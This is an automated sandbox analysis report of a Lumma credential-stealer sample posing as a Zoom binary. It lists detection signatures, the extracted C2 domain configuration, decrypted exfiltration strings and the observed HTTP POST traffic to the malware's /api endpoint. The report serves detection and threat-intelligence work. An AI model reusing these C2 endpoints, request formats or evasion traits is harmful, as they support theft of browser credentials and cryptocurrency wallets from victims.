Windows Analysis Report
rwsNDpQSKZ.exe

Overview

General Information

Sample name:rwsNDpQSKZ.exe
renamed because original name is a hash value
Original sample name:5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd.exe
Analysis ID:1483410
MD5:35e69f7b1869d8e9cf4270b6ec33ef41
SHA1:0c89e58442108b0f503b3cc586bccc0ec9d6d9e6
SHA256:5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd
Tags:116-203-8-165, exe, LummaStealer
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rwsNDpQSKZ.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\rwsNDpQSKZ.exe" MD5: 35E69F7B1869D8E9CF4270B6EC33EF41)
  • cleanup
Name:Lumma Stealer, LummaC2 Stealer
Description:Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "edfbME--reverseproxy"}
Source:sslproxydump.pcap
Rule:JoeSecurity_LummaCStealer_3
Description:Yara detected LummaC Stealer
Author:Joe Security

Source:00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmp
Rule:Windows_Trojan_Donutloader_f40e3759
Description:unknown
Author:unknown
Strings:0x4cc14:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Source:00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp
Rule:JoeSecurity_CredentialStealer
Description:Yara detected Credential Stealer
Author:Joe Security

Source:00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp
Rule:JoeSecurity_CredentialStealer
Description:Yara detected Credential Stealer
Author:Joe Security

Source:00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp
Rule:JoeSecurity_CredentialStealer
Description:Yara detected Credential Stealer
Author:Joe Security

Source:Process Memory Space: rwsNDpQSKZ.exe PID: 6820
Rule:JoeSecurity_LummaCStealer_3
Description:Yara detected LummaC Stealer
Author:Joe Security

No Sigma rule has matched
No Snort rule has matched
            Timestamp:2024-07-27T11:25:08.531260+0200
            SID:2054603
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:13.089587+0200
            SID:2054603
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:05.948522+0200
            SID:2054603
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:14.578751+0200
            SID:2054603
            Source Port:49737
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:17.261560+0200
            SID:2054603
            Source Port:49738
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:19.539733+0200
            SID:2022930
            Source Port:443
            Destination Port:49739
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:09.041971+0200
            SID:2048094
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-27T11:25:57.781939+0200
            SID:2022930
            Source Port:443
            Destination Port:49745
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:06.794685+0200
            SID:2054653
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:10.219474+0200
            SID:2054603
            Source Port:49734
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:05.275348+0200
            SID:2054592
            Source Port:54782
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:07.307893+0200
            SID:2054603
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:11.033471+0200
            SID:2048094
            Source Port:49734
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-27T11:25:07.786991+0200
            SID:2054653
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:11.748222+0200
            SID:2054603
            Source Port:49735
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:25:13.537183+0200
            SID:2048094
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            AV Detection

            Source: https://outpointsozp.shop/api, Avira URL Cloud: Label: malware
            Source: lariatedzugspd.shop, Avira URL Cloud: Label: malware
            Source: callosallsaospz.shop, Avira URL Cloud: Label: malware
            Source: https://outpointsozp.shop:443/api, Avira URL Cloud: Label: malware
            Source: rwsNDpQSKZ.exe.6820.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "edfbME--reverseproxy"}
            Source: outpointsozp.shop, Virustotal: Detection: 19%
            Source: https://outpointsozp.shop/api, Virustotal: Detection: 22%
            Source: shepherdlyopzc.shop, Virustotal: Detection: 19%
            Source: lariatedzugspd.shop, Virustotal: Detection: 19%
            Source: upknittsoappz.shop, Virustotal: Detection: 19%
            Source: https://outpointsozp.shop:443/api, Virustotal: Detection: 22%
            Source: unseaffarignsk.shop, Virustotal: Detection: 22%
            Source: callosallsaospz.shop, Virustotal: Detection: 19%
            Source: liernessfornicsa.shop, Virustotal: Detection: 19%
            Source: rwsNDpQSKZ.exe, ReversingLabs: Detection: 39%
            Source: rwsNDpQSKZ.exe, Virustotal: Detection: 45%
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: indexterityszcoxp.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: lariatedzugspd.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: callosallsaospz.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: outpointsozp.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: liernessfornicsa.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: upknittsoappz.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: shepherdlyopzc.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: unseaffarignsk.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: outpointsozp.shop
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: Workgroup: -
            Source: 00000000.00000002.1839045076.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, String decryptor: edfbME--reverseproxy
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00CAE7E0 ??1LogMessage@logging@@QAE@XZ,?Unlock@CState@Cmm@@QAEXXZ,OutputDebugStringA,?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NPB_WW4LoggingDestination@1@W4LogLockingState@1@W4OldFileDeletionState@1@W4LogEncryptPolicy@1@K@Z,?Unlock@CState@Cmm@@QAEXXZ,SetLastError,0_2_00CAE7E0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C69410 ?Set_devEncryptedType@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEXABH@Z,0_2_00C69410
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C69430 ?Get_devEncryptedType@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEAAHXZ,0_2_00C69430
            Source: rwsNDpQSKZ.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: rwsNDpQSKZ.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: c:\jenkins\workspace\Client\Client\Windows\release\Bin\Release\ZoomOutlookMAPI.pdb source: rwsNDpQSKZ.exe
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00CBE0BE FindFirstFileW,FindClose,0_2_00CBE0BE
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00D067D0 FindFirstFileExW,0_2_00D067D0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C628A3 SetLastError,FindFirstFileW,RemoveDirectoryW,?Unlock@CState@Cmm@@QAEXXZ,GetProcessHeap,HeapFree,FindNextFileW,GetProcessHeap,HeapFree,FindClose,SetLastError,0_2_00C628A3
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C63070 cmm_fs_find_first,cmm_wstr_ncpy,FindFirstFileW,0_2_00C63070

            Networking

            Source: Joe Sandbox View, IP Address: 188.114.97.3
            Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: outpointsozp.shop
            Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 54 | Host: outpointsozp.shop
            Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18170 | Host: outpointsozp.shop
            Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8791 | Host: outpointsozp.shop
            Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20444 | Host: outpointsozp.shop
            Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1283 | Host: outpointsozp.shop
            Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 573113 | Host: outpointsozp.shop
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic, DNS traffic detected: DNS query: outpointsozp.shop
            Source: unknown, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: outpointsozp.shop
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: rwsNDpQSKZ.exeString found in binary or memory: https://zoom.us/privacy/support
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2

            System Summary

            Source: 00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5398 appears 230 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5D3E7 appears 75 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5960 appears 54 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C56FFA appears 201 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C9B84F appears 93 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5365 appears 679 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5DC01 appears 148 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5DE1B appears 185 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5DEC4 appears 58 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5D860 appears 39 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5333 appears 239 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5D270 appears 36 times
            Source: rwsNDpQSKZ.exeStatic PE information: invalid certificate
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1715639612.0000000005240000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZoom* vs rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZoom* vs rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exeBinary or memory string: OriginalFilenameZoom* vs rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CD35F0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,Concurrency::cancel_current_task,0_2_00CD35F0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDC74F __EH_prolog3_GS,GetCommandLineW,LoadLibraryW,CoInitializeEx,CoCreateInstance,?Unlock@CState@Cmm@@QAEXXZ,0_2_00CDC74F
            Source: rwsNDpQSKZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743279105.0000000005B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rwsNDpQSKZ.exeReversingLabs: Detection: 39%
            Source: rwsNDpQSKZ.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile read: C:\Users\user\Desktop\rwsNDpQSKZ.exeJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: profapi.dllJump to behavior
